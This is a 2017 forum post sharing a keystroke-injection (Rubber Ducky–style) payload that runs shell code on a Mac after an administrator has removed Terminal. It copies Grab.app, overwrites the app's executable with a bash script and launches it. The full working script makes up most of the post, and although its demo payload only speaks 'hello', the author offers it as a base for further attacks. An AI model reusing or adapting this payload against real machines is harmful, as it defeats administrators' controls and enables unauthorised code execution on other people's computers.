3.14159jam Posted May 5, 2017 Share Posted May 5, 2017 Here is my new payload to attack a Mac without using terminal. I got this idea after seeing how using good management software, an administrator can remove an app from a Mac (one such application being terminal). This eliminated a lot of the attacks I have previously made to work against a Mac. So I got to thinking and poking around inside of applications, and it turns out you can replace the contents of certain files in a Mac application and you can run scripts. You simply open the right file and replace it with your code, and then run the application. The app no longer functions normally, but by making a duplicate app in another folder and editing that one you can run your attack code without completely losing the original files and all without terminal. I used Grab.app for this but almost any app could be used, I wanted to find one that was not likely to have anything similarly named around it because of the way I selected the application to copy it. Here is the code, its outcome is to simply "say hello" (so if you test it have the volume up a bit). I have not really played with the delays yet, they are all over the place and some are to high but it makes it a bit easier to see what is going on. This is not a final project but rather a starting point to spark some new ideas. Have Fun, but please use this responsibly. DELAY 2000 COMMAND SPACE DELAY 300 STRING /Applications/Utilities/ DELAY 200 ENTER DELAY 400 STRING g DELAY 500 COMMAND c DELAY 300 COMMAND SPACE DELAY 300 STRING /Users/Shared/ DELAY 400 ENTER DELAY 400 COMMAND v DELAY 2000 COMMAND SPACE DELAY 300 STRING /Users/Shared/Grab.app/Contents/MacOS/ DELAY 600 ENTER DELAY 500 TAB DELAY 500 COMMAND o DELAY 500 COMMAND a DELAY 500 STRING #!/bin/bash DELAY 400 ENTER DELAY 300 STRING say DELAY 300 ESCAPE DELAY 300 SPACE DELAY 300 STRING hello DELAY 300 COMMAND s DELAY 400 COMMAND q DELAY 500 COMMAND SPACE DELAY 300 STRING /Users/Shared/Grab.app DELAY 400 ENTER COMMAND w COMMAND w COMMAND w Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.